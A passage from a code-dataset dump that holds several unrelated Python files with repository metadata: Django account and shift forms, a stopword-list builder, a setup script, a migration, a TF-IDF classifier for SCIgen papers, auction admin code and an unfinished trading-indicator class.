] | 5 | 2021-09-11T23:31:10.000Z | 2022-03-06T20:29:59.000Z | import datetime
import re
from configparser import ConfigParser
from smtplib import SMTPException
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import send_mail
from django.core.mail.backends.smtp import EmailBackend
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.html import strip_tags
from django.utils.http import urlsafe_base64_encode
from accounts.models import Account, Shift
class LoginForm(forms.Form):
email = forms.EmailField(label="Email")
password = forms.CharField(
label="Password", widget=forms.PasswordInput(render_value=False)
)
def clean_email(self):
return self.cleaned_data["email"].lower()
def clean(self):
if self._errors:
return
self.account = authenticate(
email=self.cleaned_data["email"], password=self.cleaned_data["password"]
)
if self.account is None:
raise forms.ValidationError(
"The email and/or password you entered are incorrect."
)
return self.cleaned_data
def login(self, request):
if self.is_valid():
login(request, self.account)
return True
return False
class PasswordResetForm(forms.Form):
email = forms.EmailField(label="Email")
def clean_email(self):
try:
self.account = Account.objects.get(email=self.cleaned_data["email"].lower())
except Account.DoesNotExist:
raise forms.ValidationError(
"The email is not associated with any accounts."
)
return self.cleaned_data["email"].lower()
def save(self, request):
url = request.build_absolute_uri("/accounts/password/reset/")
url += urlsafe_base64_encode(force_bytes(self.account.uid)) + "/"
url += default_token_generator.make_token(self.account) + "/"
html = render_to_string(
"email.html",
{
"url": url,
"message": "You requested a password reset.",
"button": "Reset Password",
},
)
text = strip_tags(html).replace("Reset Password", url)
config = ConfigParser(interpolation=None)
config.read(settings.CONFIG_FILE)
backend = EmailBackend(
host=config.get("email", "EMAIL_HOST"),
port=config.getint("email", "EMAIL_PORT"),
username=config.get("email", "EMAIL_USER"),
password=config.get("email", "EMAIL_PASSWORD"),
use_tls=config.getboolean("email", "EMAIL_USE_TLS"),
)
try:
send_mail(
subject="Reset Password | Business Tracker",
message=text,
html_message=html,
from_email=config.get("email", "EMAIL_USER"),
recipient_list=(self.cleaned_data["email"],),
connection=backend,
)
except SMTPException:
return False
return True
class PasswordResetConfirmForm(forms.Form):
new_password = forms.CharField(
label="New Password", widget=forms.PasswordInput(render_value=False)
)
verify_new_password = forms.CharField(
label="Verify New Password", widget=forms.PasswordInput(render_value=False)
)
def clean_new_password(self):
if not re.match(settings.PASSWORD_REGEX, self.cleaned_data["new_password"]):
raise forms.ValidationError(
"The password needs to have at least 8 characters, a letter, and a number."
)
return self.cleaned_data["new_password"]
def clean(self):
if self._errors:
return
if (
self.cleaned_data["new_password"]
!= self.cleaned_data["verify_new_password"]
):
raise forms.ValidationError("The passwords do not match.")
return self.cleaned_data
def save(self, account):
account.set_password(self.cleaned_data["new_password"])
account.save()
return account
class PasswordChangeForm(forms.Form):
new_password = forms.CharField(
label="New Password", widget=forms.PasswordInput(render_value=False)
)
verify_new_password = forms.CharField(
label="Verify New Password", widget=forms.PasswordInput(render_value=False)
)
def clean_new_password(self):
if not re.match(settings.PASSWORD_REGEX, self.cleaned_data["new_password"]):
raise forms.ValidationError(
"The password needs to have at least 8 characters, a letter, and a number."
)
return self.cleaned_data["new_password"]
def clean(self):
if self._errors:
return
if (
self.cleaned_data["new_password"]
!= self.cleaned_data["verify_new_password"]
):
raise forms.ValidationError("The passwords do not match.")
return self.cleaned_data
def save(self, account):
account.set_password(self.cleaned_data["new_password"])
account.save()
return account
class AccountForm(forms.ModelForm):
verify_email = forms.EmailField(label="Verify Email")
class Meta:
model = Account
exclude = ("last_login", "password", "is_superuser")
labels = {
"first_name": "First Name",
"last_name": "Last Name",
"address1": "Address Line 1",
"address2": "Address Line 2",
"state": "State / Region / Province",
"zipcode": "ZIP / Postal Code",
}
def clean_email(self):
return self.cleaned_data["email"].lower()
def clean_verify_email(self):
return self.cleaned_data["verify_email"].lower()
def clean_first_name(self):
if not re.match(settings.NAME_REGEX, self.cleaned_data["first_name"]):
raise forms.ValidationError("Enter a valid first name.")
return self.cleaned_data["first_name"]
def clean_last_name(self):
if not re.match(settings.NAME_REGEX, self.cleaned_data["last_name"]):
raise forms.ValidationError("Enter a valid last name.")
return self.cleaned_data["last_name"]
def clean(self):
self.cleaned_data = super().clean()
if self._errors:
return
if self.cleaned_data["email"] != self.cleaned_data["verify_email"]:
raise forms.ValidationError("The emails do not match.")
return self.cleaned_data
def save(self, request=None):
account = super().save(commit=False)
if not account._state.adding:
account.save()
return account
account.is_superuser = False
account.save()
url = request.build_absolute_uri("/accounts/password/reset/")
url += urlsafe_base64_encode(force_bytes(account.uid)) + "/"
url += default_token_generator.make_token(account) + "/"
html = render_to_string(
"email.html",
{
"url": url,
"message": f"{account.first_name}, activate your new account using the link below.",
"button": "Activate Account",
},
)
text = strip_tags(html).replace("Activate Account", url)
config = ConfigParser(interpolation=None)
config.read(settings.CONFIG_FILE)
backend = EmailBackend(
host=config.get("email", "EMAIL_HOST"),
port=config.getint("email", "EMAIL_PORT"),
username=config.get("email", "EMAIL_USER"),
password=config.get("email", "EMAIL_PASSWORD"),
use_tls=config.getboolean("email", "EMAIL_USE_TLS"),
)
try:
send_mail(
subject="Activate Account | Business Tracker",
message=text,
html_message=html,
from_email=config.get("email", "EMAIL_USER"),
recipient_list=(self.cleaned_data["email"],),
connection=backend,
)
return account
except SMTPException:
return False
class ShiftForm(forms.ModelForm):
duration = forms.CharField(
max_length=5, help_text="Must be formatted as HH:MM (00:00 - 16:00)"
)
class Meta:
model = Shift
exclude = ("worker",)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["project"].empty_label = ""
if not self.initial.get("duration", None):
self.initial["duration"] = "00:00"
if not self.initial.get("date", None):
self.initial["date"] = datetime.date.today()
instance = getattr(self, "instance", None)
if instance and instance.pk and self.initial["duration"]:
hours = self.initial["duration"] // 3600
minutes = self.initial["duration"] % 3600 // 60
self.initial["duration"] = f"{hours:02d}:{minutes:02d}"
def clean_duration(self):
if len(self.cleaned_data["duration"]) != 5:
raise forms.ValidationError("Enter a valid duration.")
duration_str = self.cleaned_data["duration"].split(":")
if not (duration_str[0].isdecimal() and duration_str[1].isdecimal()):
raise forms.ValidationError("Enter a valid duration.")
self.cleaned_data["duration"] = (
int(duration_str[0]) * 3600 + int(duration_str[1]) * 60
)
if self.cleaned_data["duration"] not in range(60, 57601):
raise forms.ValidationError("Enter a valid duration.")
return self.cleaned_data["duration"]
| 34.918149 | 100 | 0.610171 | 1,089 | 9,812 | 5.341598 | 0.197429 | 0.066185 | 0.090253 | 0.046931 | 0.589479 | 0.530342 | 0.525185 | 0.465704 | 0.444903 | 0.436651 | 0 | 0.008047 | 0.278129 | 9,812 | 280 | 101 | 35.042857 | 0.813215 | 0 | 0 | 0.493671 | 0 | 0 | 0.169181 | 0.009784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080169 | false | 0.168776 | 0.063291 | 0.012658 | 0.324895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
107ee9ab6b9b9047573689de88a1c06760a9cb86 | 3,960 | py | Python | src/stopwords/create_stopword_list.py | prrao87/topic-modelling | b7bceef8711edb097c3afec95c30474ae0789e1f | [
"MIT"
] | 3 | 2020-11-22T14:55:58.000Z | 2021-03-13T17:59:26.000Z | src/stopwords/create_stopword_list.py | prrao87/topic-modelling | b7bceef8711edb097c3afec95c30474ae0789e1f | [
"MIT"
] | null | null | null | src/stopwords/create_stopword_list.py | prrao87/topic-modelling | b7bceef8711edb097c3afec95c30474ae0789e1f | [
"MIT"
] | null | null | null | """
Script to generate a custom list of stopwords that extend upon existing lists.
"""
import json
import spacy
from urllib.request import urlopen
from itertools import chain
def combine(*lists):
"Combine an arbitrary number of lists into a single list"
return list(chain(*lists))
def get_spacy_lemmas():
spacy_lemma_url = "https://raw.githubusercontent.com/explosion/spacy-lookups-data/master/spacy_lookups_data/data/en_lemma_lookup.json"
with urlopen(spacy_lemma_url) as response:
lemmas = response.read()
return json.loads(lemmas)
def lookup_verbs(roots, spacy_lemmas):
"""Return a full of list light verbs and all its forms"""
def flatten(list_of_lists):
"Return a flattened list of a list of lists"
return [item for sublist in list_of_lists for item in sublist]
verblist = []
for root in roots:
verbs = [key for key in spacy_lemmas if spacy_lemmas[key] == root]
verbs.append(root)
verblist.append(verbs)
return flatten(verblist)
if __name__ == "__main__":
# We first get the default spaCy stopword list
nlp = spacy.blank('en')
spacy_stopwords = nlp.Defaults.stop_words
spacy_lemmas = get_spacy_lemmas()
# Create custom lists depending on the class of words seen in the data
person_titles = ['mr', 'mrs', 'ms', 'dr', 'mr.', 'mrs.', 'ms.', 'dr.', 'e']
broken_words = ['don', 'isn', 'mustn', 'shouldn', 'couldn', 'doesn', 'didn']
numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '000']
url_terms = ['http', 'https', 'ref', 'href', 'com', 'src']
days_of_the_week = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
months_of_the_year = ['january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
time_periods = ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'week', 'weeks',
'month', 'months', 'year', 'years']
time_related = ['yesterday', 'today', 'tomorrow', 'day', 'night', 'morning',
'afternoon', 'evening', 'edt', 'est', 'time', 'times']
common_nouns = ['new', 'york', 'nytimes', 'press', 'news', 'report', 'page', 'user', 'file', 'video', 'pic',
'photo', 'online', 'social', 'media', 'group', 'inbox', 'item',
'advertisement', 'world', 'store', 'story', 'life', 'family',
'people', 'man', 'woman', 'friend', 'friends']
social_media = ['twitter', 'facebook', 'google', 'gmail', 'video', 'photo', 'image',
'user', 'social', 'media', 'page', 'online', 'stream', 'post',
'app']
light_verb_roots = [
'ask', 'come', 'go', 'know', 'look', 'see', 'talk', 'try', 'use', 'want', 'call', 'click',
'continue', 'comment', 'do', 'feel', 'find', 'give', 'get', 'have', 'include', 'like', 'live',
'love', 'make', 'post', 'read', 'say', 'speak', 'send', 'share', 'show', 'sign', 'tag',
'take', 'tell', 'think', 'update', 'work', 'write'
]
# Convert light verb roots to all its forms using lemma lookup
light_verbs_full = lookup_verbs(light_verb_roots, spacy_lemmas)
# Combine into a single lit of stopwords
add_stopwords = set(
combine(
person_titles, broken_words, numbers, url_terms, days_of_the_week, months_of_the_year,
time_periods, time_related, common_nouns, social_media, light_verbs_full
)
)
# Combine all stopwords into one list and export to text file
combined_stopwords = spacy_stopwords.union(add_stopwords)
stopword_list = sorted(list(combined_stopwords))
# Write out stopwords to file
with open('custom_stopwords.txt', 'w') as f:
for word in stopword_list:
f.write(word + '\n')
print(f"Exported {len(stopword_list)} words to stopword list.")
| 44.494382 | 138 | 0.600253 | 490 | 3,960 | 4.695918 | 0.528571 | 0.033464 | 0.014342 | 0.014776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004921 | 0.230303 | 3,960 | 88 | 139 | 45 | 0.75 | 0.134343 | 0 | 0 | 1 | 0.015625 | 0.294956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1875 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10846775ed810108f0674e3280e3bdb519f11227 | 586 | py | Python | setup.py | Lzejie/DynamicPool | 9a0d42738f55e97962e2a93a0db0b30a38fa1126 | [
"MIT"
] | 1 | 2019-01-16T03:00:18.000Z | 2019-01-16T03:00:18.000Z | setup.py | Lzejie/DynamicPool | 9a0d42738f55e97962e2a93a0db0b30a38fa1126 | [
"MIT"
] | null | null | null | setup.py | Lzejie/DynamicPool | 9a0d42738f55e97962e2a93a0db0b30a38fa1126 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Time : 18/12/10 上午10:27
# @Author : L_zejie
# @Site :
# @File : setup.py.py
# @Software: PyCharm Community Edition
from setuptools import setup, find_packages
setup(
name="DynamicPool",
packages=find_packages(),
version='0.14',
description="动态任务阻塞线程/进程池",
author="L_zejie",
author_email='lzj_xuexi@163.com',
url="https://github.com/Lzejie/DynamicPool",
license="MIT Licence",
keywords=["Thread Pool", "Dynamic Pool", "Dynamic Thread Pool", "Dynamic Process Pool"],
classifiers=[],
install_requires=[]
)
| 25.478261 | 92 | 0.648464 | 71 | 586 | 5.253521 | 0.746479 | 0.088472 | 0.064343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.187713 | 586 | 22 | 93 | 26.636364 | 0.747899 | 0.237201 | 0 | 0 | 0 | 0 | 0.365909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
109422f948a8a29c875dcfdb424e7f71d2bd02c6 | 394 | py | Python | apps/track/migrations/0022_auto_20210319_1551.py | martinlehoux/django_bike | 05373d2649647fe8ebadb0aad54b9a7ec1900fe7 | [
"MIT"
] | 1 | 2020-08-12T17:53:37.000Z | 2020-08-12T17:53:37.000Z | apps/track/migrations/0022_auto_20210319_1551.py | martinlehoux/django_bike | 05373d2649647fe8ebadb0aad54b9a7ec1900fe7 | [
"MIT"
] | 12 | 2020-07-03T03:52:00.000Z | 2021-09-22T18:00:44.000Z | apps/track/migrations/0022_auto_20210319_1551.py | martinlehoux/django_bike | 05373d2649647fe8ebadb0aad54b9a7ec1900fe7 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-19 15:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("track", "0021_auto_20200915_1528"),
]
operations = [
migrations.RemoveField(
model_name="track",
name="parser",
),
migrations.DeleteModel(
name="Point",
),
]
| 18.761905 | 47 | 0.560914 | 39 | 394 | 5.564103 | 0.794872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116541 | 0.324873 | 394 | 20 | 48 | 19.7 | 0.699248 | 0.114213 | 0 | 0.142857 | 1 | 0 | 0.126801 | 0.066282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
109a679e147b4f56e0888419c137399febf66634 | 5,432 | py | Python | papers_clf/tfidf_2_sentence.py | KellyShao/Writing-robots-vs.-Human | 86d0a2a0f4ca773417f231a2d6796b429f182e38 | [
"CECILL-B"
] | 4 | 2018-10-18T23:02:41.000Z | 2019-10-21T14:44:54.000Z | papers_clf/tfidf_2_sentence.py | KellyShao/Writing-robots-vs.-Human | 86d0a2a0f4ca773417f231a2d6796b429f182e38 | [
"CECILL-B"
] | null | null | null | papers_clf/tfidf_2_sentence.py | KellyShao/Writing-robots-vs.-Human | 86d0a2a0f4ca773417f231a2d6796b429f182e38 | [
"CECILL-B"
] | null | null | null | import csv
import math
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn.cross_validation import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction import text
from sklearn import metrics
from sklearn.metrics import roc_curve,auc,f1_score
import matplotlib.pyplot as plt
from gensim.models import word2vec
from gensim import corpora
from gensim.parsing.preprocessing import strip_numeric
from gensim.parsing.preprocessing import remove_stopwords
from gensim.parsing.preprocessing import strip_short
from gensim.parsing.preprocessing import strip_non_alphanum
stop_words = text.ENGLISH_STOP_WORDS.union([u'apr',u'archetypr',u'aug',u'configuration',u'conference',u'continuing'])#estimate
sci_file = "cs_papers/sci_after_filter.csv"
scigen_file = "cs_papers/scigen_after_filter.csv"
def import_data(file,row_content,x):
content = []
label = []
content_1 = open(file, 'r')
csv_reader = csv.reader(content_1)
for row in csv_reader:
row_new = remove_stopwords(row[row_content])
row_new = strip_numeric(row_new)
#row_new = strip_non_alphanum(row_new)
row_new = strip_short(row_new,minsize = 3)
content.append(row_new)
length = len(content)
for i in range(0,length):
label.append(x)
return content,label
sci_content, sci_label = import_data(sci_file,1,1)
scigen_content, scigen_label = import_data(scigen_file,1,0)
len1=len(sci_content)
len2=len(scigen_content)
data = sci_content+scigen_content
label = sci_label+scigen_label
def extract_sentence(content,percent):
new_content = []
for line in content:
new = line.split('.')
new_filter = []
for i in new:
if len(i)>15:
new_filter.append(i)
sum = len(new_filter)+1
sum = math.ceil(sum*percent)
cnt = 0
new_line = ''
for sent in new_filter:
cnt+=1
if(cnt<=sum):
new_line=new_line+sent
new_content.append(new_line)
return new_content
def auc(content, label,cross_fold):
f1_mean = np.zeros(20)
for i in range(0,cross_fold):
print 'cross_v'+str(i)
content_auto = content[0:928]
content_human = content[928:1836]
label_auto = label[0:928]
label_human = label[928:1836]
random_num = np.random.randint(low=0, high=100)
print 'random_num_auto:' +str(random_num)
content_train_auto,content_test_auto,label_train_auto,label_test_auto = train_test_split(content_auto, label_auto, test_size=0.2,random_state=random_num)
random_num = np.random.randint(low=0, high=100)
print 'random_num_human:' +str(random_num)
content_train_human,content_test_human,label_train_human,label_test_human = train_test_split(content_human, label_human, test_size=0.2,random_state=random_num)
content_train = content_train_auto+content_train_human
content_test = content_test_auto+content_test_human
label_train = label_train_auto+label_train_human
label_test = label_test_auto+label_test_human
vectorizer_train=TfidfVectorizer(encoding='utf-8', decode_error='ignore', strip_accents='unicode',
token_pattern=u'(?ui)\\b\\w*[a-z]+\\w*\\b', stop_words=stop_words,
lowercase=True, analyzer='word',max_features=100)# ngram_range=(1,2),
tfidf_train = vectorizer_train.fit_transform(content_train)
word_train = vectorizer_train.get_feature_names()
tfidf_metric_train = tfidf_train.toarray()
vectorizer_test=TfidfVectorizer(encoding='utf-8', decode_error='ignore', strip_accents='unicode',
token_pattern=u'(?ui)\\b\\w*[a-z]+\\w*\\b', stop_words=stop_words,
lowercase=True, analyzer='word',vocabulary=vectorizer_train.vocabulary_)
#build clf
clf = svm.SVC(kernel='linear')#, probability=True)
clf_res = clf.fit(tfidf_train, label_train)
#input sentence
for percent in range(1,101,5):
print 'sentence'+str(percent*0.01)
new_content_test = extract_sentence(content_test,percent*0.01)
tfidf_test = vectorizer_test.fit_transform(new_content_test)
word_test = vectorizer_test.get_feature_names()
pred = clf_res.predict(tfidf_test)
score_micro = f1_score(label_test, pred, average='micro')
score_macro = f1_score(label_test, pred, average='macro')
f1=(score_macro+score_micro)/2
f1_mean[(percent-1)/5]+=f1
f1_mean = f1_mean/cross_fold
#pred = clf_res.predict(tfidf_test)
##predict_prob = clf_res.predict_proba(tfidf_test)[:,1]
#auc = metrics.roc_auc_score(label_test,pred)
#print 'auc: %0.20f'%auc
#auc_mean = auc_mean+auc
#auc_mean = auc_mean/cross_fold
x_axis = range(1,21)
x=np.array(x_axis)
plt.plot(x,f1_mean)
plt.show()
print f1_mean
f1_mean = list(f1_mean)
f1_mean_csv=pd.DataFrame(f1_mean)
f1_mean_csv.to_csv('f1/f1_tfidf_sentence.csv',mode='a',header=False)
auc(data,label,10)
| 40.537313 | 168 | 0.660714 | 746 | 5,432 | 4.516086 | 0.237265 | 0.01959 | 0.020184 | 0.035619 | 0.287919 | 0.190264 | 0.122291 | 0.122291 | 0.104482 | 0.104482 | 0 | 0.024485 | 0.240611 | 5,432 | 133 | 169 | 40.842105 | 0.792242 | 0.058542 | 0 | 0.037383 | 0 | 0 | 0.059593 | 0.027582 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.186916 | null | null | 0.046729 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10a59a24a85be6682daa683fce4544a51ae31094 | 312 | py | Python | auction/admin.py | AnthonyNicklin/newage-auctions | f829c9761e4fef0c084cf0244a4617a4bda8e0c2 | [
"FSFAP"
] | 1 | 2021-07-29T07:47:10.000Z | 2021-07-29T07:47:10.000Z | auction/admin.py | AnthonyNicklin/newage-auctions | f829c9761e4fef0c084cf0244a4617a4bda8e0c2 | [
"FSFAP"
] | 9 | 2019-12-19T21:27:23.000Z | 2022-01-13T01:59:10.000Z | auction/admin.py | AnthonyNicklin/newage-auctions | f829c9761e4fef0c084cf0244a4617a4bda8e0c2 | [
"FSFAP"
] | 1 | 2020-02-11T19:50:45.000Z | 2020-02-11T19:50:45.000Z | from django.contrib import admin
from .models import Auction, Lot, Bid
class BidAdmin(admin.ModelAdmin):
readonly_fields = (
'user',
'auction',
'bid_amount',
'bid_time',
)
admin.site.register(Auction)
admin.site.register(Lot)
admin.site.register(Bid, BidAdmin)
| 16.421053 | 37 | 0.644231 | 36 | 312 | 5.5 | 0.527778 | 0.136364 | 0.257576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240385 | 312 | 18 | 38 | 17.333333 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0.092949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10a637ed134f858c509d1512e086fa81036f6f19 | 922 | py | Python | scale/source/apps.py | kaydoh/scale | 1b6a3b879ffe83e10d3b9d9074835a4c3bf476ee | [
"Apache-2.0"
] | 121 | 2015-11-18T18:15:33.000Z | 2022-03-10T01:55:00.000Z | scale/source/apps.py | kaydoh/scale | 1b6a3b879ffe83e10d3b9d9074835a4c3bf476ee | [
"Apache-2.0"
] | 1,415 | 2015-12-23T23:36:04.000Z | 2022-01-07T14:10:09.000Z | scale/source/apps.py | kaydoh/scale | 1b6a3b879ffe83e10d3b9d9074835a4c3bf476ee | [
"Apache-2.0"
] | 66 | 2015-12-03T20:38:56.000Z | 2020-07-27T15:28:11.000Z | """Defines the application configuration for the source application"""
from __future__ import unicode_literals
from django.apps import AppConfig
class SourceConfig(AppConfig):
"""Configuration for the source app
"""
name = 'source'
label = 'source'
verbose_name = 'Source'
def ready(self):
"""
Override this method in subclasses to run code when Django starts.
"""
# Register source file parse saver
from job.configuration.data.data_file import DATA_FILE_PARSE_SAVER
from source.configuration.source_data_file import SourceDataFileParseSaver
DATA_FILE_PARSE_SAVER['DATA_FILE_PARSE_SAVER'] = SourceDataFileParseSaver()
# Register source message types
from messaging.messages.factory import add_message_type
from source.messages.purge_source_file import PurgeSourceFile
add_message_type(PurgeSourceFile)
| 30.733333 | 83 | 0.724512 | 104 | 922 | 6.192308 | 0.471154 | 0.062112 | 0.086957 | 0.083851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215835 | 922 | 29 | 84 | 31.793103 | 0.890733 | 0.252712 | 0 | 0 | 0 | 0 | 0.059633 | 0.03211 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.461538 | 0 | 0.846154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
10abfb12f6e2336b0704fd165a04ee71fb341a6a | 10,391 | py | Python | indicator17.py | nkzhengwt/Spyder_cta | 1cb5e8fd9d70da381ef198aec6431aca4feb24da | [
"MIT"
] | 13 | 2018-05-18T09:19:24.000Z | 2019-03-18T02:06:49.000Z | indicator17.py | nkuzhengwt/spyder_cta | 1cb5e8fd9d70da381ef198aec6431aca4feb24da | [
"MIT"
] | null | null | null | indicator17.py | nkuzhengwt/spyder_cta | 1cb5e8fd9d70da381ef198aec6431aca4feb24da | [
"MIT"
] | 2 | 2019-03-17T14:29:10.000Z | 2019-04-09T01:50:38.000Z | # -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import math
import datetime
import time
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
class Indicators():
def __init__(self, dataframe, params = []):
self.dataframe = dataframe
self.params = params
self.dataframe['return'] = 0
for i in range(1,len(dataframe['return'])):
#http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
dataframe.loc[i,'return'] = (self.dataframe.loc[i,'open']-self.dataframe.loc[i-1,'open'])/self.dataframe.loc[i-1,'open']
self.Return = dataframe['return']
self.dataframe['time'] = dataframe['tradeDate']
self.dataframe['cumulative_return'] = self.dataframe['open']
self.dataframe['cumulative_return'] = self.dataframe['cumulative_return']/self.dataframe.loc[0,'open']
self.dataframe['cumulative_return'] = dataframe['cumulative_return']#*1000000
self.dataframe.index = pd.to_datetime(dataframe['tradeDate'])#!!!!!
#分年计算
self.year_slice = {}
i = 0
y = time.strptime(self.dataframe['time'].iat[0],"%Y-%m-%d").tm_year
for j in range(1,len(self.dataframe)):
if y != time.strptime(self.dataframe['time'].iat[j],"%Y-%m-%d").tm_year:
self.year_slice[str(y)] = dataframe[i:j-1]
y = time.strptime(self.dataframe['time'].iat[j],"%Y-%m-%d").tm_year
i = j
self.year_slice[str(y)] = dataframe[i:]
###年化收益
def annual_return(self,asset,year):
R = self.year_slice[year][asset].iat[-1]/self.year_slice[year][asset].iat[0]
t1 = time.strptime(self.year_slice[year]['time'].iat[0],"%Y-%m-%d")
t2 = time.strptime(self.year_slice[year]['time'].iat[-1],"%Y-%m-%d")
d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
n = (d2-d1).days
n = n/244
# print('The annual return for %s in %s is %f' %(asset,year,math.pow(R, 1/n)-1))
return math.pow(R, 1/n)-1
###最大回撤
def max_draw(self,asset,year):
self.year_slice[year]['max'] = 0
self.year_slice[year].ix[0,'max'] = self.year_slice[year].ix[0,asset]#loc, iloc, and ix
for i in range(1, len(self.year_slice[year][asset])):
if self.year_slice[year].ix[i, asset] > self.year_slice[year].ix[i-1, 'max']:
self.year_slice[year].ix[i, 'max'] = self.year_slice[year].ix[i, asset]
else:
self.year_slice[year].ix[i, 'max'] = self.year_slice[year].ix[i-1, 'max']
self.year_slice[year]['retreat']=(self.year_slice[year][asset]- self.year_slice[year]['max'])/self.year_slice[year]['max']
print('The max draw for %s in %s is %f' %(asset,year,abs(min(self.year_slice[year]['retreat']))))
return abs(min(self.year_slice[year]['retreat']))
###波动率
def volatility(self,asset,year):
print('The volatility for %s in %s is %f' %(asset,year,np.std(self.year_slice[year][asset])*math.sqrt(244/len(self.year_slice[year][asset]))))
return np.std(self.year_slice[year][asset])*math.sqrt(244/len(self.year_slice[year][asset]))
###夏普比率
def sharp(self, asset,no_risk_R,year):
print('The Sharp Ratio for %s in %s is %.7f' %(asset,year,(self.annual_return(asset,year)-no_risk_R)/(self.volatility(asset,year)*math.sqrt(244/len(self.year_slice[year][asset]))+1e-10)))
return (self.annual_return(asset,year)-no_risk_R)/(self.volatility(asset,year)*math.sqrt(244/len(self.year_slice[year][asset]))+1e-10)
###卡玛比率
def calmar(self,asset,year):
print('The Calmar Ratio for %s in %s is %f' %(asset,year,self.annual_return(asset,year)/self.max_draw(asset,year)))
return self.annual_return(asset,year)/self.max_draw(asset,year)
###日胜率
def daily_win_ratio(self,asset,year):
#df的条件选择不是self.dataframe[asset][self.dataframe[asset] > 0]而是self.dataframe[self.dataframe[asset] > 0][asset]
#!!
pnl = asset.replace('asset','pnl')
n1 = len(self.year_slice[year][self.year_slice[year][pnl] > 0][pnl])
n2 = len(self.year_slice[year][pnl])
print('The daily win ratio for %s in %s is %f' %(asset,year,n1/n2))
return n1/n2
###日盈亏比
def win_lose_ratio(self,asset,year):
self.year_slice[year]['dif'] = self.year_slice[year][asset] - self.year_slice[year][asset].shift(1)
print('The win lose ratio for %s in %s is %f' %(asset,year,abs(min(self.year_slice[year]['retreat']))))
return abs(sum(self.year_slice[year][self.year_slice[year]['dif']>0]['dif']))/abs(sum(self.year_slice[year][self.year_slice[year]['dif']<0]['dif']))
###大回撤区间
def worst_draw_interval(self,asset,year):
self.year_slice[year]['max'] = 0
self.year_slice[year].ix[0,'max'] = self.year_slice[year].ix[0,asset]
self.year_slice[year]['max_time'] = self.year_slice[year]['time']
for i in range(1, len(self.year_slice[year][asset])):
if self.year_slice[year].ix[i, asset] > self.year_slice[year].ix[i-1, 'max']:
